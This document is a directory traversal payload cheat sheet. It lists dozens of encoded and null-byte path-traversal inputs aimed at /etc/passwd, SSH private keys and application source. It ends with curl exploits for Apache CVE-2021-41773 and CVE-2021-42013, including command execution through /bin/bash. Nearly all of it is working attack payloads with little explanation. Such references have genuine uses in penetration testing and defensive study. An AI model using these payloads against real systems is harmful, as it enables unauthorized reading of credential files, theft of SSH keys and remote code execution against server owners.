Directory (Path) Traversal

Directory traversal attack exploits an application to gain unauthorized access to the file system.

- [exploits-50383](https://www.exploit-db.com/exploits/50383)
- [exploits-0406](https://www.exploit-db.com/exploits/50406)

/?file=index.php
/?file=index.html
/?file=/etc/passwd
/?file=../../../etc/passwd
/?file=../../../../etc/passwd
/?file=../../../../../etc/passwd
/?file=..//..//..//..//etc/passwd
/?file=....//....//....//etc/passwd
/?file=....//....//....//....//etc/passwd
# URL encode
/?file=..%252f..%252f..%252fetc/passwd
/?file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
# URL double encode
/?file=%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd
/?file=/var/www/images/../../../etc/passwd
/?file=/etc/passwd%00.png
/?file=../../../etc/passwd%00.png
/?file=....//....//....//etc/passwd%00.png
/?file=..%252f..%252f..%252fetc/passwd%00.png
/?file=/var/www/images/../../../etc/passwd%00.png

# Hostfile
/?file=/etc/hosts

# SSH keys
/?file=../../../../../home/<username>/.ssh/authorized_keys
/?file=../../../../../home/<username>/.ssh/id_rsa

# Web root in the developer's home
/?file=../../../../home/<username>/app/app.py

# PHP web application
/index.php/../
/index.php/..;/
/index.php/%2e%2e;/

# Windows
/?file=..\..\..\windows\win.ini


Apache 2.4.49 (CVE-2021-41773)

# without CGI enabled
curl -v 'https://example.com/cgi-bin/../../../../../../../../../../etc/passwd'
curl -v 'https://example.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd'
curl -v 'https://example.com/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'

# with CGI enabled
curl -v 'http://example.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; cat /etc/passwd' -H "Content-Type: text/plain"


Apache 2.4.50 (CVE-2021-42013)

# without CGI enabled
curl -v 'https://example.com/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'

# with CGI enabled
curl -v 'https://example.com/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' -d 'echo Content-Type: text/plain; echo; cat /etc/passwd' -H "Content-Type: text/plain"